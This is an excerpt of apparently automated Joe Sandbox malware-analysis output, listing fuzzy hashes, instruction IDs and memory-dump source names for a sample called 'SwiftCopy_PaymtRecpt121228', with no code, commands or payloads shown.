                                                    • Opcode Fuzzy Hash: 08b423e04f7c6c8def9d6921fe139551c12b9da8df5fd0fecaf4c428bc00d3b2
                                                    • Instruction Fuzzy Hash: CC8100347106148FCB18EB28D498EA97BF6FF89B15B1541A9E902CB3B5DB71EC05CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 7d4e33415080ab8abc09c6ba5d4efda5ab8126858aead76358e3d9ecba1d22de
                                                    • Instruction ID: 6134c478017be352625e5c314c56a4100af118a4e182519e09e6b80a52348eb4
                                                    • Opcode Fuzzy Hash: 7d4e33415080ab8abc09c6ba5d4efda5ab8126858aead76358e3d9ecba1d22de
                                                    • Instruction Fuzzy Hash: A9818535A10209DFCB04DFA4D898EADBBB5FF89320F158559E902AB364EB709D45CF90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 375b998cefa5c00fa27b7ddb0fceb2a263c5934cb6de3e8242046f2a698509d1
                                                    • Instruction ID: 54cb5589ab4a8cd4fc7bd0e6cc6a18396995f3ee40e60a011e99f2154575ee85
                                                    • Opcode Fuzzy Hash: 375b998cefa5c00fa27b7ddb0fceb2a263c5934cb6de3e8242046f2a698509d1
                                                    • Instruction Fuzzy Hash: A6816E31B04204CFDB24DF68D584EAEB7F2FF88320F1584B9D45AAB655DB30A942CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 00b2dabbff85158d0e337ea7a932cd11361b33811cc4b09b8849f68f15297864
                                                    • Instruction ID: cbb337ba8661be539087dd18290a8fca87104f9637fb225aec87af319590dcf1
                                                    • Opcode Fuzzy Hash: 00b2dabbff85158d0e337ea7a932cd11361b33811cc4b09b8849f68f15297864
                                                    • Instruction Fuzzy Hash: F5714C39E00619CFDB14DFB9C858BADBBB2FF88310F148569E816A7250EF749945CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 33d35b15056dab2a14c61be63f558d15c600322a21b1b6f828a03b0f0d40ee7f
                                                    • Instruction ID: e7d5cc2fb1bc28a5b41e4c7c9d96394cf5768d7af4cc6549ef5f6907dea758b4
                                                    • Opcode Fuzzy Hash: 33d35b15056dab2a14c61be63f558d15c600322a21b1b6f828a03b0f0d40ee7f
                                                    • Instruction Fuzzy Hash: 1A517D71A002049FCB24DF69C484FADBBF6FF89310F148169D85AAB361DB75D845CB91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 08a229ace1701810e7fdc7608f4140b59ad65661997018b52985466b5d27ee0c
                                                    • Instruction ID: 166ff24af8ed811a432d2491afb8cb629400c5d9f336477316f668525ac681e4
                                                    • Opcode Fuzzy Hash: 08a229ace1701810e7fdc7608f4140b59ad65661997018b52985466b5d27ee0c
                                                    • Instruction Fuzzy Hash: 14715F78A01208EFCB15DF59D488EAEBBB6BF48724F114498F915AB361DB31EC81CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 0a54baa9468d3e0824952ded211e060c9c0c767c8043999fdc9adad7d8fa441e
                                                    • Instruction ID: aae12631f2bf3dd4bea1c183ddbed9210f777844cb47cadc1ece7aacbf684a04
                                                    • Opcode Fuzzy Hash: 0a54baa9468d3e0824952ded211e060c9c0c767c8043999fdc9adad7d8fa441e
                                                    • Instruction Fuzzy Hash: B85179317002148FCB24EB69D594FAABBBABF89310F104069E85ADB3A1DB75EC45CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 11c66964bf919976fdbb27736ceff56265c7fa9f2c17f0ab39a5baa63e9b2aff
                                                    • Instruction ID: 102c5dea5a48fe33355ad3df5acaec66f274a572181938762256d0934d371f1f
                                                    • Opcode Fuzzy Hash: 11c66964bf919976fdbb27736ceff56265c7fa9f2c17f0ab39a5baa63e9b2aff
                                                    • Instruction Fuzzy Hash: 2E414734B152589FDB24DB69C894EAEBBF6BF49710F1440A9E912EB3A1DB31DC04CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 72b43f8b5fbe42a625dedbdce5d3a9d70820bdbe69aeac223c871b782be41fb9
                                                    • Instruction ID: 7b9b96409be4ef5884ae5bd46695cb5c90cdf18cabfbba286feb0f6f5dc6a504
                                                    • Opcode Fuzzy Hash: 72b43f8b5fbe42a625dedbdce5d3a9d70820bdbe69aeac223c871b782be41fb9
                                                    • Instruction Fuzzy Hash: A3415F35A0061A8BDF04DF69D444BEEB7F1FF88311F14852AE855E7290DB38D985CB61
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c7a8518eb3e745bf3a1f251aa72b5e6d64caa41e082c17881fc606c3a14df2a4
                                                    • Instruction ID: 79a057d072ca94bc34514516a8e07b0b0c2789a22e52a0ee99c70ff0697db9b4
                                                    • Opcode Fuzzy Hash: c7a8518eb3e745bf3a1f251aa72b5e6d64caa41e082c17881fc606c3a14df2a4
                                                    • Instruction Fuzzy Hash: 4141FA38A042288FDB14EBA8C844FDDBBF5BF48714F114054E906BB3A1DB35A805CFA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 523239c4600d6b11d084fe4b179b91b63276bc738c42196679b0dd200e48060e
                                                    • Instruction ID: e6c03a8432bd57e207b0200c0118955052f0a606d1eff888f17d896938d9a6a9
                                                    • Opcode Fuzzy Hash: 523239c4600d6b11d084fe4b179b91b63276bc738c42196679b0dd200e48060e
                                                    • Instruction Fuzzy Hash: FA419F71C493A89FDB11DFA8C864BCDBFB1FF49324F19405AD444AB292C3788849CBA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 64fe0161a002ab80bdb141497219380a2f696b551bb8e239596ec58e652fa26e
                                                    • Instruction ID: dc521f161b54e2ed57c8d5e9185a62e55a47d17c23eef44e69eb71f63356df43
                                                    • Opcode Fuzzy Hash: 64fe0161a002ab80bdb141497219380a2f696b551bb8e239596ec58e652fa26e
                                                    • Instruction Fuzzy Hash: 883103313057408FD726AB389950D667BABAF8621931849BECC97CB295EB34DC05C760
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c2cbb27e0f3fa248b092107050d8a1159375586c4f690d41b75f47810ec979b1
                                                    • Instruction ID: 312328926dbab891f09c924d9e0ef1eabf0011d1178dc4b5701d0e5d9f261cfc
                                                    • Opcode Fuzzy Hash: c2cbb27e0f3fa248b092107050d8a1159375586c4f690d41b75f47810ec979b1
                                                    • Instruction Fuzzy Hash: BB411A359206099FCB00EFA8D955EDDBBB1FF49320F108529E845B7254EB30AA98CF91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b5728ace02a8e9e42c8905d4ac79be4aab759a288a4331025a36c589985b13ba
                                                    • Instruction ID: 0dcb2f3c499e6cb30e50ed7a2d483653e9c87f5313e7ec69e736cae6726778d2
                                                    • Opcode Fuzzy Hash: b5728ace02a8e9e42c8905d4ac79be4aab759a288a4331025a36c589985b13ba
                                                    • Instruction Fuzzy Hash: 183189347042048FCB25DF28C494DA97BFAAF89725B1501AAE952DB3B1DB31EC05CBA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8ce2421d5c95ffdfeafda4071506070b5b9da57d60a8d1e97e0b604511df4abf
                                                    • Instruction ID: eb2352bd9125db488aa2cdc9da41293e3477940055de1d32667135c62be10f84
                                                    • Opcode Fuzzy Hash: 8ce2421d5c95ffdfeafda4071506070b5b9da57d60a8d1e97e0b604511df4abf
                                                    • Instruction Fuzzy Hash: 27413771610B058FDB35CF28D44AF6ABBF2FB45320F144E29EAAAC7610D774E8458B91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c340176db6c784a3dc523cd780a8c1ebb92128f4168c48df1d0bddd11cbcdf28
                                                    • Instruction ID: afa620d972bb55372ab60303065f67e694443695655c645aca95a3ad9043486a
                                                    • Opcode Fuzzy Hash: c340176db6c784a3dc523cd780a8c1ebb92128f4168c48df1d0bddd11cbcdf28
                                                    • Instruction Fuzzy Hash: 5831D171604200CBCB29DF28D885EAA7F72FF91314F24897CE8569B345C736DA5AC792
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 228b7b7b07d6ceb1917b4ccd26bec8c1a6f8d7a12aa6a018b00537d880612403
                                                    • Instruction ID: 981dff968e82a22055b4ca4f5cc80dbae9d31458b313963e100928a1bd749ce2
                                                    • Opcode Fuzzy Hash: 228b7b7b07d6ceb1917b4ccd26bec8c1a6f8d7a12aa6a018b00537d880612403
                                                    • Instruction Fuzzy Hash: AB310171608300CFC71ADF28D885D9D7F71FF91314B28886DE8969B242D735CA5AC7A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 1b9b64caf6284b72f40ec55bae0b10b49b697ebb13de900bf1d3780d25bd864c
                                                    • Instruction ID: e95db4eda33debf200d24d76f4113a8f535ec246ff14bd9816d4d4c583784c48
                                                    • Opcode Fuzzy Hash: 1b9b64caf6284b72f40ec55bae0b10b49b697ebb13de900bf1d3780d25bd864c
                                                    • Instruction Fuzzy Hash: 06214C367146108FCF19EB69E454D6E37EAAF8866571540AAED06CB360EE31DC41CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: da3292c60443eae4238968beb7f4bf942efa6ab43de2299e2208f3bd379e9562
                                                    • Instruction ID: 63be5725ffa8ea3a8bad3f3dd1af7735935a7808247ac3867d7a4788c4ee66dc
                                                    • Opcode Fuzzy Hash: da3292c60443eae4238968beb7f4bf942efa6ab43de2299e2208f3bd379e9562
                                                    • Instruction Fuzzy Hash: BE2124767042108FEB248B69C881DBF77E7FBC4320B288069E54797395C634F981C7A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 60b71887b131db192b5c21d27d36d8273c3efe3cbf0666b85768648580ee533f
                                                    • Instruction ID: 2bbb390b204379f7cdafc17cb690ce487b36a9b248a64d67bf66c56e6b34556b
                                                    • Opcode Fuzzy Hash: 60b71887b131db192b5c21d27d36d8273c3efe3cbf0666b85768648580ee533f
                                                    • Instruction Fuzzy Hash: 6F310539A20219DFCB04DFA9D894EADB7B6FF88710F5181A9E915EB320C730A800CF50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b1052c8054584f3c0b03716da859c61ace6917e76791c276efb9ff6ff3340be3
                                                    • Instruction ID: 7a99abe4997ce501b92f7e2d721dfa3eab14ad3a40089c524a1590306eae774e
                                                    • Opcode Fuzzy Hash: b1052c8054584f3c0b03716da859c61ace6917e76791c276efb9ff6ff3340be3
                                                    • Instruction Fuzzy Hash: B321FF767006108FEB248B25C881DBF77E6FBC4221B288029E95797394CA38E981C7A1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5d134786ec2fc9de8808b07cb837f19d410468dc73adae67ab16c6a1991cc8d3
                                                    • Instruction ID: d55c98a449f2358022e59f27978490d0001213a6cbc7cf55819cfde5852e8b9a
                                                    • Opcode Fuzzy Hash: 5d134786ec2fc9de8808b07cb837f19d410468dc73adae67ab16c6a1991cc8d3
                                                    • Instruction Fuzzy Hash: C721C671610B049BD735DF38D48AF66B7F6FB45320F040E29EAAACB600D774E8458B91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f9a457bd1be36bdcdf3dd636b076d12e2fda464897efcb8d38c43024abe127a1
                                                    • Instruction ID: ff99f2c91de5c6f056f1eea39d0f4451f2350c463fb9e57a2d48fc3de23b1d5e
                                                    • Opcode Fuzzy Hash: f9a457bd1be36bdcdf3dd636b076d12e2fda464897efcb8d38c43024abe127a1
                                                    • Instruction Fuzzy Hash: CE21CF367003018FC7259F69E444F2AB7E6FFC8221B10C46EEA9ACB311DA71EC418B91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: edde9651bd4d02baf24e7404c99986ced935d04ed9802bfb346cd81b9f73a409
                                                    • Instruction ID: df1f15b261827d3dbd61036bc58a9c3e65b85f065e15b5fee7c9d1cce8bd2e51
                                                    • Opcode Fuzzy Hash: edde9651bd4d02baf24e7404c99986ced935d04ed9802bfb346cd81b9f73a409
                                                    • Instruction Fuzzy Hash: 5D2192F2D04609CFCB027FA8E55A4BEFF75FF41221F010955D5C5A2495EE3108A98B91
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 83888b5f3fe5714dbc78e7474351b01b1e5481919e37a26ea1b092d5e380f205
                                                    • Instruction ID: b3517490c48a1b4854dbc945420bed74c1002c2eb3b55d6106bed470db29eac6
                                                    • Opcode Fuzzy Hash: 83888b5f3fe5714dbc78e7474351b01b1e5481919e37a26ea1b092d5e380f205
                                                    • Instruction Fuzzy Hash: 53217C343012108FCB29DB29D454E6A73FAEF85724B1080AEE906CB3B5DB75EC46CB51
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69a6b2b014e38735862937fa4eb5c38ff30f64bce174c3d16a2878b89baf622f
                                                    • Instruction ID: b272d91fa01a0ad0aa924779b180879d20456e04a606fd06c75dc197d41c1dc0
                                                    • Opcode Fuzzy Hash: 69a6b2b014e38735862937fa4eb5c38ff30f64bce174c3d16a2878b89baf622f
                                                    • Instruction Fuzzy Hash: 19214C343112108FCB19DB29D454E6973EAEF85724B50846DEA06CB365DB75EC46CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: b15394d2630e22a028d5acf51177abe60d71c9caff4845be435d97681db6d7ac
                                                    • Instruction ID: f89f00aa6ce951754a2685b92b061cf2478e4e63d4f02ce83845e1ff557cbb02
                                                    • Opcode Fuzzy Hash: b15394d2630e22a028d5acf51177abe60d71c9caff4845be435d97681db6d7ac
                                                    • Instruction Fuzzy Hash: 1721B331D04209CBDB14DF68D418BEEBBB2FF88321F14C529E95677240DB759A49CBA0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5bc94089ff9393b18c38465b5ed86c9fea159fc75f552c4bf43b6a10fd935748
                                                    • Instruction ID: 2a1e0bbce6eb421904906e3e0418166dfe226207910f7afe956075c5e8761fb9
                                                    • Opcode Fuzzy Hash: 5bc94089ff9393b18c38465b5ed86c9fea159fc75f552c4bf43b6a10fd935748
                                                    • Instruction Fuzzy Hash: 8B2138397006109FCB24DF19E984F6AB3AAFF88720B15842EEA5697750DB71F841CB50
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065857846.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9dd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 036b1d6aec51224ab0b4febb74e29fb23e1002fe73acb13672c80ac07515e731
                                                    • Instruction ID: 090f41ca6b5adbeb8d2d8821dd09b4960707134f5ee7f93a54aa1fba77c130a9
                                                    • Opcode Fuzzy Hash: 036b1d6aec51224ab0b4febb74e29fb23e1002fe73acb13672c80ac07515e731
                                                    • Instruction Fuzzy Hash: 7E21F2715853049FCB05DF64C9C0F26BB69FB94314F20C96EEA594B356C33AD846CAA1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2065857846.00000000009DD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009DD000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_9dd000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 69002a8dd4eb1276f66f976c6f4a23ba52ecd9ad9028184f890245604f685707
                                                    • Instruction ID: b7d5657ac483341d4bc85b13cfd0ed0ba1c57f79be1d8d65489b2959007b3d45
                                                    • Opcode Fuzzy Hash: 69002a8dd4eb1276f66f976c6f4a23ba52ecd9ad9028184f890245604f685707
                                                    • Instruction Fuzzy Hash: 29210771585204DFCB05DF24D9C4B26FF69FB84318F24C96EE9094B3A6C37AD846CA62
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8a266b48c34a11d1ec78be9ec40a6f80e050eb0c23bd4c62e7e96bcbb5022a9e
                                                    • Instruction ID: e651964708fe3ed8112d620948ecc940e41ffaeeeb3ce4282faebc0f0cd3c083
                                                    • Opcode Fuzzy Hash: 8a266b48c34a11d1ec78be9ec40a6f80e050eb0c23bd4c62e7e96bcbb5022a9e
                                                    • Instruction Fuzzy Hash: 45212C75E002099FCF05DFA9D8409EDFBB6FF8C311B14826AE918A7210E731A955CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 268509ec9cb93cd932bbef0d5a821f5773e5e29794d2f1120b9e67e6f4fed225
                                                    • Instruction ID: 7c5d8c8df9b86462fc0fdd5c6ee2db336a42d4b21ffb4f50fef3ac9fc1520a68
                                                    • Opcode Fuzzy Hash: 268509ec9cb93cd932bbef0d5a821f5773e5e29794d2f1120b9e67e6f4fed225
                                                    • Instruction Fuzzy Hash: E72171F1D106099ECB017BA9E59A87FFF39FF41311F010955E585A2094EE3148AD8BD5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: c6187b17cd50143eb26cbf4c38028269d46384369ee2db1669c326a44316e4ee
                                                    • Instruction ID: 9733e8907a90b8ab6925f5a2ab52b3b349e7b12c097f16efac0e824debd00dce
                                                    • Opcode Fuzzy Hash: c6187b17cd50143eb26cbf4c38028269d46384369ee2db1669c326a44316e4ee
                                                    • Instruction Fuzzy Hash: 47212875E002199FCF05DFA9D840ADDFBB6FF4C310F14826AE914A7250E731A995CB90
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 3378a7b12ad8d6ab966dfe0d79ef41630f47136fd14571980f064a9dec063170
                                                    • Instruction ID: 72d49eb8c439e34c061e0636d3216cbe008d076650465e5bde366fc3add8cdd7
                                                    • Opcode Fuzzy Hash: 3378a7b12ad8d6ab966dfe0d79ef41630f47136fd14571980f064a9dec063170
                                                    • Instruction Fuzzy Hash: F131E0B0D013189FDB20DF99C989B9EBFF5BB48714F64841AE404BB290C7B59845CFA5
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 720792dc581031d5fd2a357c715f14a591b066f0e393226a6e48c58f025b27cb
                                                    • Instruction ID: 67428166fc6015843a563b340a935101e8edfa592d7c643c48922f3594ef0f98
                                                    • Opcode Fuzzy Hash: 720792dc581031d5fd2a357c715f14a591b066f0e393226a6e48c58f025b27cb
                                                    • Instruction Fuzzy Hash: DC31C0B0D013189FDB20DF99C988B9EBFF5BB08724F64841AE805BB240C7B55845CF94
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.2072579411.0000000005A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A50000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_5a50000_SwiftCopy_PaymtRecpt121228.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
